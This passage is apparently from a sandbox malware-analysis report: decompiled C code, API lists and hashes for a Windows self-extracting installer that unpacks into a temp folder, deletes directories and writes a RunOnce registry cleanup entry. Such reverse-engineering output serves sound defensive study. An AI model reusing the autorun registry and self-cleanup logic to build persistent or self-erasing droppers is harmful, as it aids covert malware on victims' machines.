                                                          				intOrPtr _t41;
                                                          				intOrPtr* _t44;
                                                          				signed int _t46;
                                                          				int _t47;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          
                                                          				_t43 = __edx;
                                                          				_t9 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t9 ^ _t46;
                                                          				if( *0x1098a38 != 0) {
                                                          					L5:
                                                          					_t11 = E01095164(_t52);
                                                          					_t53 = _t11;
                                                          					if(_t11 == 0) {
                                                          						L16:
                                                          						_t12 = 0;
                                                          						L17:
                                                          						return E01096CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                          					}
                                                          					_t14 = E010955A0(_t53); // executed
                                                          					if(_t14 == 0) {
                                                          						goto L16;
                                                          					} else {
                                                          						_t45 = 0x105;
                                                          						GetSystemDirectoryA( &_v272, 0x105);
                                                          						_t43 = 0x105;
                                                          						_t40 =  &_v272;
                                                          						E0109658A( &_v272, 0x105, "advapi32.dll");
                                                          						_t36 = LoadLibraryA( &_v272);
                                                          						_t44 = 0;
                                                          						if(_t36 != 0) {
                                                          							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                          							_v276 = _t31;
                                                          							if(_t31 != 0) {
                                                          								_t45 = _t47;
                                                          								_t40 = _t31;
                                                          								 *0x109a288("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                          								_v276();
                                                          								if(_t47 != _t47) {
                                                          									_t40 = 4;
                                                          									asm("int 0x29");
                                                          								}
                                                          							}
                                                          						}
                                                          						FreeLibrary(_t36);
                                                          						_t58 =  *0x1098a24 - _t44; // 0x0
                                                          						if(_t58 != 0) {
                                                          							L14:
                                                          							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                          							if(_t21 != 0) {
                                                          								__eflags =  *0x1098a2c - _t44; // 0x0
                                                          								if(__eflags != 0) {
                                                          									L20:
                                                          									__eflags =  *0x1098d48 & 0x000000c0;
                                                          									if(( *0x1098d48 & 0x000000c0) == 0) {
                                                          										_t41 =  *0x1099a40; // 0x3, executed
                                                          										_t26 = E0109256D(_t41); // executed
                                                          										_t44 = _t26;
                                                          									}
                                                          									_t22 =  *0x1098a24; // 0x0
                                                          									 *0x1099a44 = _t44;
                                                          									__eflags = _t22;
                                                          									if(_t22 != 0) {
                                                          										L26:
                                                          										__eflags =  *0x1098a38;
                                                          										if( *0x1098a38 == 0) {
                                                          											__eflags = _t22;
                                                          											if(__eflags == 0) {
                                                          												E01094169(__eflags);
                                                          											}
                                                          										}
                                                          										_t12 = 1;
                                                          										goto L17;
                                                          									} else {
                                                          										__eflags =  *0x1099a30 - _t22; // 0x0
                                                          										if(__eflags != 0) {
                                                          											goto L26;
                                                          										}
                                                          										_t25 = E01093BA2(); // executed
                                                          										__eflags = _t25;
                                                          										if(_t25 == 0) {
                                                          											goto L16;
                                                          										}
                                                          										_t22 =  *0x1098a24; // 0x0
                                                          										goto L26;
                                                          									}
                                                          								}
                                                          								_t27 = E01093B26(_t40, _t44);
                                                          								__eflags = _t27;
                                                          								if(_t27 == 0) {
                                                          									goto L16;
                                                          								}
                                                          								goto L20;
                                                          							}
                                                          							_t43 = 0x4bc;
                                                          							E010944B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                          							 *0x1099124 = E01096285();
                                                          							goto L16;
                                                          						}
                                                          						_t59 =  *0x1099a30 - _t44; // 0x0
                                                          						if(_t59 != 0) {
                                                          							goto L14;
                                                          						}
                                                          						_t30 = E0109621E(); // executed
                                                          						if(_t30 == 0) {
                                                          							goto L16;
                                                          						}
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          				_t49 =  *0x1098a24;
                                                          				if( *0x1098a24 != 0) {
                                                          					L4:
                                                          					_t34 = E01093A3F(_t51);
                                                          					_t52 = _t34;
                                                          					if(_t34 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					goto L5;
                                                          				}
                                                          				if(E010951E5(_t49) == 0) {
                                                          					goto L16;
                                                          				}
                                                          				_t51 =  *0x1098a38;
                                                          				if( *0x1098a38 != 0) {
                                                          					goto L5;
                                                          				}
                                                          				goto L4;
                                                          			}




























                                                          0x01092f1d
                                                          0x01092f28
                                                          0x01092f2f
                                                          0x01092f3d
                                                          0x01092f6c
                                                          0x01092f6c
                                                          0x01092f71
                                                          0x01092f73
                                                          0x01093041
                                                          0x01093041
                                                          0x01093043
                                                          0x01093053
                                                          0x01093053
                                                          0x01092f79
                                                          0x01092f80
                                                          0x00000000
                                                          0x01092f86
                                                          0x01092f86
                                                          0x01092f93
                                                          0x01092f9e
                                                          0x01092fa0
                                                          0x01092fa6
                                                          0x01092fb8
                                                          0x01092fba
                                                          0x01092fbe
                                                          0x01092fc6
                                                          0x01092fcc
                                                          0x01092fd4
                                                          0x01092fd6
                                                          0x01092fd8
                                                          0x01092fe0
                                                          0x01092fe6
                                                          0x01092fee
                                                          0x01092ff0
                                                          0x01092ff5
                                                          0x01092ff5
                                                          0x01092fee
                                                          0x01092fd4
                                                          0x01092ff8
                                                          0x01092ffe
                                                          0x01093004
                                                          0x01093017
                                                          0x0109301c
                                                          0x01093024
                                                          0x01093054
                                                          0x0109305a
                                                          0x01093065
                                                          0x01093065
                                                          0x0109306c
                                                          0x0109306e
                                                          0x01093075
                                                          0x0109307a
                                                          0x0109307a
                                                          0x0109307c
                                                          0x01093081
                                                          0x01093087
                                                          0x01093089
                                                          0x010930a1
                                                          0x010930a1
                                                          0x010930a9
                                                          0x010930ab
                                                          0x010930ad
                                                          0x010930af
                                                          0x010930af
                                                          0x010930ad
                                                          0x010930b6
                                                          0x00000000
                                                          0x0109308b
                                                          0x0109308b
                                                          0x01093091
                                                          0x00000000
                                                          0x00000000
                                                          0x01093093
                                                          0x01093098
                                                          0x0109309a
                                                          0x00000000
                                                          0x00000000
                                                          0x0109309c
                                                          0x00000000
                                                          0x0109309c
                                                          0x01093089
                                                          0x0109305c
                                                          0x01093061
                                                          0x01093063
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01093063
                                                          0x0109302b
                                                          0x01093032
                                                          0x0109303c
                                                          0x00000000
                                                          0x0109303c
                                                          0x01093006
                                                          0x0109300c
                                                          0x00000000
                                                          0x00000000
                                                          0x0109300e
                                                          0x01093015
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01093015
                                                          0x01092f80
                                                          0x01092f3f
                                                          0x01092f46
                                                          0x01092f5f
                                                          0x01092f5f
                                                          0x01092f64
                                                          0x01092f66
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01092f66
                                                          0x01092f4f
                                                          0x00000000
                                                          0x00000000
                                                          0x01092f55
                                                          0x01092f5d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 01092F93
                                                          • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 01092FB2
                                                          • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 01092FC6
                                                          • DecryptFileA.ADVAPI32 ref: 01092FE6
                                                          • FreeLibrary.KERNEL32(00000000), ref: 01092FF8
                                                          • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0109301C
                                                            • Part of subcall function 010951E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01092F4D,?,00000002,00000000), ref: 01095201
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                          • API String ID: 2126469477-1274120739
                                                          • Opcode ID: 47f987bfd8271eaadfb840f0126b9e451a1c88e81ddcd889653f835347872f6b
                                                          • Instruction ID: 18aed90339131e12a786073032ce717d1f423bea3772f2d7ffb9fafd21c47746
                                                          • Opcode Fuzzy Hash: 47f987bfd8271eaadfb840f0126b9e451a1c88e81ddcd889653f835347872f6b
                                                          • Instruction Fuzzy Hash: EA41ED30A002059AEF71AB799D786AA37E8FB85754F0041AAFAC1C6155EB7EC580EF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 86%
                                                          			E01092390(CHAR* __ecx) {
                                                          				signed int _v8;
                                                          				char _v276;
                                                          				char _v280;
                                                          				char _v284;
                                                          				struct _WIN32_FIND_DATAA _v596;
                                                          				struct _WIN32_FIND_DATAA _v604;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t21;
                                                          				int _t36;
                                                          				void* _t46;
                                                          				void* _t62;
                                                          				void* _t63;
                                                          				CHAR* _t65;
                                                          				void* _t66;
                                                          				signed int _t67;
                                                          				signed int _t69;
                                                          
                                                          				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                          				_t21 =  *0x1098004; // 0x8a9c601
                                                          				_t22 = _t21 ^ _t69;
                                                          				_v8 = _t21 ^ _t69;
                                                          				_t65 = __ecx;
                                                          				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                          					L10:
                                                          					_pop(_t62);
                                                          					_pop(_t66);
                                                          					_pop(_t46);
                                                          					return E01096CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                          				} else {
                                                          					E01091680( &_v276, 0x104, __ecx);
                                                          					_t58 = 0x104;
                                                          					E010916B3( &_v280, 0x104, "*");
                                                          					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                          					_t63 = _t22;
                                                          					if(_t63 == 0xffffffff) {
                                                          						goto L10;
                                                          					} else {
                                                          						goto L3;
                                                          					}
                                                          					do {
                                                          						L3:
                                                          						_t58 = 0x104;
                                                          						E01091680( &_v276, 0x104, _t65);
                                                          						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                          							_t58 = 0x104;
                                                          							E010916B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                          							SetFileAttributesA( &_v280, 0x80);
                                                          							DeleteFileA( &_v280);
                                                          						} else {
                                                          							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                          								E010916B3( &_v276, 0x104,  &(_v596.cFileName));
                                                          								_t58 = 0x104;
                                                          								E0109658A( &_v280, 0x104, 0x1091140);
                                                          								E01092390( &_v284);
                                                          							}
                                                          						}
                                                          						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                          					} while (_t36 != 0);
                                                          					FindClose(_t63); // executed
                                                          					_t22 = RemoveDirectoryA(_t65); // executed
                                                          					goto L10;
                                                          				}
                                                          			}





















                                                          0x01092398
                                                          0x0109239e
                                                          0x010923a3
                                                          0x010923a5
                                                          0x010923ae
                                                          0x010923b3
                                                          0x010924cb
                                                          0x010924d2
                                                          0x010924d3
                                                          0x010924d4
                                                          0x010924df
                                                          0x010923c2
                                                          0x010923d1
                                                          0x010923db
                                                          0x010923e4
                                                          0x010923f6
                                                          0x010923fc
                                                          0x01092401
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01092407
                                                          0x01092407
                                                          0x01092408
                                                          0x01092411
                                                          0x0109241f
                                                          0x0109247a
                                                          0x01092483
                                                          0x01092495
                                                          0x010924a3
                                                          0x01092421
                                                          0x0109242f
                                                          0x01092453
                                                          0x0109245d
                                                          0x01092466
                                                          0x01092472
                                                          0x01092472
                                                          0x0109242f
                                                          0x010924af
                                                          0x010924b5
                                                          0x010924be
                                                          0x010924c5
                                                          0x00000000
                                                          0x010924c5

                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(?,01098A3A,010911F4,01098A3A,00000000,?,?), ref: 010923F6
                                                          • lstrcmpA.KERNEL32(?,010911F8), ref: 01092427
                                                          • lstrcmpA.KERNEL32(?,010911FC), ref: 0109243B
                                                          • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 01092495
                                                          • DeleteFileA.KERNEL32(?), ref: 010924A3
                                                          • FindNextFileA.KERNELBASE(00000000,00000010), ref: 010924AF
                                                          • FindClose.KERNELBASE(00000000), ref: 010924BE
                                                          • RemoveDirectoryA.KERNELBASE(01098A3A), ref: 010924C5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                          • String ID:
                                                          • API String ID: 836429354-0
                                                          • Opcode ID: 941eec77298e03acd90467eb9e8367e9d3f2435520f59fc466e0e3e7994ffcb9
                                                          • Instruction ID: 7584819bc9e9aada24f9b7b9b7742d5b1485a02d31a09df1fb879602f589b790
                                                          • Opcode Fuzzy Hash: 941eec77298e03acd90467eb9e8367e9d3f2435520f59fc466e0e3e7994ffcb9
                                                          • Instruction Fuzzy Hash: 4E31A371704741ABDB30DA64CC68AEB77ECBBC4311F04492EA5D587280EF3895099751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 70%
                                                          			E01092BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				long _t4;
                                                          				void* _t6;
                                                          				intOrPtr _t7;
                                                          				void* _t9;
                                                          				struct HINSTANCE__* _t12;
                                                          				intOrPtr* _t17;
                                                          				signed char _t19;
                                                          				intOrPtr* _t21;
                                                          				void* _t22;
                                                          				void* _t24;
                                                          				intOrPtr _t32;
                                                          
                                                          				_t4 = GetVersion();
                                                          				if(_t4 >= 0 && _t4 >= 6) {
                                                          					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                          					if(_t12 != 0) {
                                                          						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                          						if(_t21 != 0) {
                                                          							_t17 = _t21;
                                                          							 *0x109a288(0, 1, 0, 0);
                                                          							 *_t21();
                                                          							_t29 = _t24 - _t24;
                                                          							if(_t24 != _t24) {
                                                          								_t17 = 4;
                                                          								asm("int 0x29");
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t20 = _a12;
                                                          				_t18 = _a4;
                                                          				 *0x1099124 = 0;
                                                          				if(E01092CAA(_a4, _a12, _t29, _t17) != 0) {
                                                          					_t9 = E01092F1D(_t18, _t20); // executed
                                                          					_t22 = _t9; // executed
                                                          					E010952B6(0, _t18, _t21, _t22); // executed
                                                          					if(_t22 != 0) {
                                                          						_t32 =  *0x1098a3a; // 0x0
                                                          						if(_t32 == 0) {
                                                          							_t19 =  *0x1099a2c; // 0x0
                                                          							if((_t19 & 0x00000001) != 0) {
                                                          								E01091F90(_t19, _t21, _t22);
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t6 =  *0x1098588; // 0x0
                                                          				if(_t6 != 0) {
                                                          					CloseHandle(_t6);
                                                          				}
                                                          				_t7 =  *0x1099124; // 0x0
                                                          				return _t7;
                                                          			}


















                                                          0x01092c03
                                                          0x01092c0d
                                                          0x01092c18
                                                          0x01092c20
                                                          0x01092c2e
                                                          0x01092c32
                                                          0x01092c36
                                                          0x01092c3d
                                                          0x01092c43
                                                          0x01092c45
                                                          0x01092c47
                                                          0x01092c49
                                                          0x01092c4e
                                                          0x01092c4e
                                                          0x01092c47
                                                          0x01092c32
                                                          0x01092c20
                                                          0x01092c50
                                                          0x01092c54
                                                          0x01092c57
                                                          0x01092c64
                                                          0x01092c66
                                                          0x01092c6b
                                                          0x01092c6d
                                                          0x01092c74
                                                          0x01092c76
                                                          0x01092c7c
                                                          0x01092c7e
                                                          0x01092c87
                                                          0x01092c89
                                                          0x01092c89
                                                          0x01092c87
                                                          0x01092c7c
                                                          0x01092c74
                                                          0x01092c8e
                                                          0x01092c95
                                                          0x01092c98
                                                          0x01092c98
                                                          0x01092c9e
                                                          0x01092ca7

                                                          APIs
                                                          • GetVersion.KERNEL32(?,00000002,00000000,?,01096BB0,01090000,00000000,00000002,0000000A), ref: 01092C03
                                                          • GetModuleHandleW.KERNEL32(Kernel32.dll,?,01096BB0,01090000,00000000,00000002,0000000A), ref: 01092C18
                                                          • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 01092C28
                                                          • CloseHandle.KERNEL32(00000000,?,?,01096BB0,01090000,00000000,00000002,0000000A), ref: 01092C98
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Handle$AddressCloseModuleProcVersion
                                                          • String ID: HeapSetInformation$Kernel32.dll
                                                          • API String ID: 62482547-3460614246
                                                          • Opcode ID: 2e8dd372a5117c44ba33a820e651971753299bd8c77793b4f2977a749b5815be
                                                          • Instruction ID: f0dba682f947148e547e6ce498ee52a4127eea2457b1e9f9d416eeb7bfd7fa74
                                                          • Opcode Fuzzy Hash: 2e8dd372a5117c44ba33a820e651971753299bd8c77793b4f2977a749b5815be
                                                          • Instruction Fuzzy Hash: E511CDF130124DBBDF307BF9A874E5B3B99BB85394B040059FAC0D3244DA3AD841A754
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01096F40() {
                                                          
                                                          				SetUnhandledExceptionFilter(E01096EF0); // executed
                                                          				return 0;
                                                          			}



                                                          0x01096f45
                                                          0x01096f4d

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 01096F45
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 0b5bac7735d769212f9305f6a7a479d9a83d13a7671607b75bb117d193ac75ae
                                                          • Instruction ID: 9302c88e2add9c811b70efc15228212e9c9341f31c69609542d22afe98c34166
                                                          • Opcode Fuzzy Hash: 0b5bac7735d769212f9305f6a7a479d9a83d13a7671607b75bb117d193ac75ae
                                                          • Instruction Fuzzy Hash: 859002B035110087DB201B71993941575916A4D6827815464A091C9448DB6644406611
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 93%
                                                          			E0109202A(struct HINSTANCE__* __edx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v528;
                                                          				void* _v532;
                                                          				int _v536;
                                                          				int _v540;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t28;
                                                          				long _t36;
                                                          				long _t41;
                                                          				struct HINSTANCE__* _t46;
                                                          				intOrPtr _t49;
                                                          				intOrPtr _t50;
                                                          				CHAR* _t54;
                                                          				void _t56;
                                                          				signed int _t66;
                                                          				intOrPtr* _t72;
                                                          				void* _t73;
                                                          				void* _t75;
                                                          				void* _t80;
                                                          				intOrPtr* _t81;
                                                          				void* _t86;
                                                          				void* _t87;
                                                          				void* _t90;
                                                          				_Unknown_base(*)()* _t91;
                                                          				signed int _t93;
                                                          				void* _t94;
                                                          				void* _t95;
                                                          
                                                          				_t79 = __edx;
                                                          				_t28 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t28 ^ _t93;
                                                          				_t84 = 0x104;
                                                          				memset( &_v268, 0, 0x104);
                                                          				memset( &_v528, 0, 0x104);
                                                          				_t95 = _t94 + 0x18;
                                                          				_t66 = 0;
                                                          				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                          				if(_t36 != 0) {
                                                          					L24:
                                                          					return E01096CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                          				}
                                                          				_push(_t86);
                                                          				_t87 = 0;
                                                          				while(1) {
                                                          					E0109171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                          					_t95 = _t95 + 0x10;
                                                          					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                          					if(_t41 != 0) {
                                                          						break;
                                                          					}
                                                          					_t87 = _t87 + 1;
                                                          					if(_t87 < 0xc8) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				if(_t87 != 0xc8) {
                                                          					GetSystemDirectoryA( &_v528, _t84);
                                                          					_t79 = _t84;
                                                          					E0109658A( &_v528, _t84, "advpack.dll");
                                                          					_t46 = LoadLibraryA( &_v528); // executed
                                                          					_t84 = _t46;
                                                          					if(_t84 == 0) {
                                                          						L10:
                                                          						if(GetModuleFileNameA( *0x1099a3c,  &_v268, 0x104) == 0) {
                                                          							L17:
                                                          							_t36 = RegCloseKey(_v532);
                                                          							L23:
                                                          							_pop(_t86);
                                                          							goto L24;
                                                          						}
                                                          						L11:
                                                          						_t72 =  &_v268;
                                                          						_t80 = _t72 + 1;
                                                          						do {
                                                          							_t49 =  *_t72;
                                                          							_t72 = _t72 + 1;
                                                          						} while (_t49 != 0);
                                                          						_t73 = _t72 - _t80;
                                                          						_t81 = 0x10991e4;
                                                          						do {
                                                          							_t50 =  *_t81;
                                                          							_t81 = _t81 + 1;
                                                          						} while (_t50 != 0);
                                                          						_t84 = _t73 + 0x50 + _t81 - 0x10991e5;
                                                          						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x10991e5);
                                                          						if(_t90 != 0) {
                                                          							 *0x1098580 = _t66 ^ 0x00000001;
                                                          							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                          							if(_t66 == 0) {
                                                          								_t54 = "%s /D:%s";
                                                          							}
                                                          							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                          							E0109171E(_t90, _t84, _t54,  &_v268);
                                                          							_t75 = _t90;
                                                          							_t23 = _t75 + 1; // 0x1
                                                          							_t79 = _t23;
                                                          							do {
                                                          								_t56 =  *_t75;
                                                          								_t75 = _t75 + 1;
                                                          							} while (_t56 != 0);
                                                          							_t24 = _t75 - _t79 + 1; // 0x2
                                                          							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                          							RegCloseKey(_v532); // executed
                                                          							_t36 = LocalFree(_t90);
                                                          							goto L23;
                                                          						}
                                                          						_t79 = 0x4b5;
                                                          						E010944B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                          						goto L17;
                                                          					}
                                                          					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                          					_t66 = 0 | _t91 != 0x00000000;
                                                          					FreeLibrary(_t84); // executed
                                                          					if(_t91 == 0) {
                                                          						goto L10;
                                                          					}
                                                          					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                          						E0109658A( &_v268, 0x104, 0x1091140);
                                                          					}
                                                          					goto L11;
                                                          				}
                                                          				_t36 = RegCloseKey(_v532);
                                                          				 *0x1098530 = _t66;
                                                          				goto L23;
                                                          			}

































                                                          0x0109202a
                                                          0x01092035
                                                          0x0109203c
                                                          0x01092041
                                                          0x01092050
                                                          0x0109205f
                                                          0x01092064
                                                          0x0109206f
                                                          0x0109208c
                                                          0x01092094
                                                          0x01092257
                                                          0x01092266
                                                          0x01092266
                                                          0x0109209a
                                                          0x0109209b
                                                          0x0109209d
                                                          0x010920aa
                                                          0x010920af
                                                          0x010920c9
                                                          0x010920d1
                                                          0x00000000
                                                          0x00000000
                                                          0x010920d3
                                                          0x010920da
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010920da
                                                          0x010920e2
                                                          0x01092103
                                                          0x0109210e
                                                          0x01092116
                                                          0x01092122
                                                          0x01092128
                                                          0x0109212c
                                                          0x01092179
                                                          0x01092194
                                                          0x010921de
                                                          0x010921e4
                                                          0x01092256
                                                          0x01092256
                                                          0x00000000
                                                          0x01092256
                                                          0x01092196
                                                          0x01092196
                                                          0x0109219c
                                                          0x0109219f
                                                          0x0109219f
                                                          0x010921a1
                                                          0x010921a2
                                                          0x010921a6
                                                          0x010921a8
                                                          0x010921b0
                                                          0x010921b0
                                                          0x010921b2
                                                          0x010921b3
                                                          0x010921bc
                                                          0x010921c7
                                                          0x010921cb
                                                          0x010921f1
                                                          0x010921f6
                                                          0x010921fd
                                                          0x010921ff
                                                          0x010921ff
                                                          0x01092204
                                                          0x01092213
                                                          0x01092218
                                                          0x0109221d
                                                          0x0109221d
                                                          0x01092220
                                                          0x01092220
                                                          0x01092222
                                                          0x01092223
                                                          0x01092229
                                                          0x0109223d
                                                          0x01092249
                                                          0x01092250
                                                          0x00000000
                                                          0x01092250
                                                          0x010921d2
                                                          0x010921d9
                                                          0x00000000
                                                          0x010921d9
                                                          0x0109213a
                                                          0x01092141
                                                          0x01092144
                                                          0x0109214c
                                                          0x00000000
                                                          0x00000000
                                                          0x01092163
                                                          0x01092172
                                                          0x01092172
                                                          0x00000000
                                                          0x01092163
                                                          0x010920ea
                                                          0x010920f0
                                                          0x00000000

                                                          APIs
                                                          • memset.MSVCRT ref: 01092050
                                                          • memset.MSVCRT ref: 0109205F
                                                          • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0109208C
                                                            • Part of subcall function 0109171E: _vsnprintf.MSVCRT ref: 01091750
                                                          • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010920C9
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010920EA
                                                          • GetSystemDirectoryA.KERNEL32 ref: 01092103
                                                          • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01092122
                                                          • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 01092134
                                                          • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01092144
                                                          • GetSystemDirectoryA.KERNEL32 ref: 0109215B
                                                          • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0109218C
                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010921C1
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010921E4
                                                          • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0109223D
                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01092249
                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01092250
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
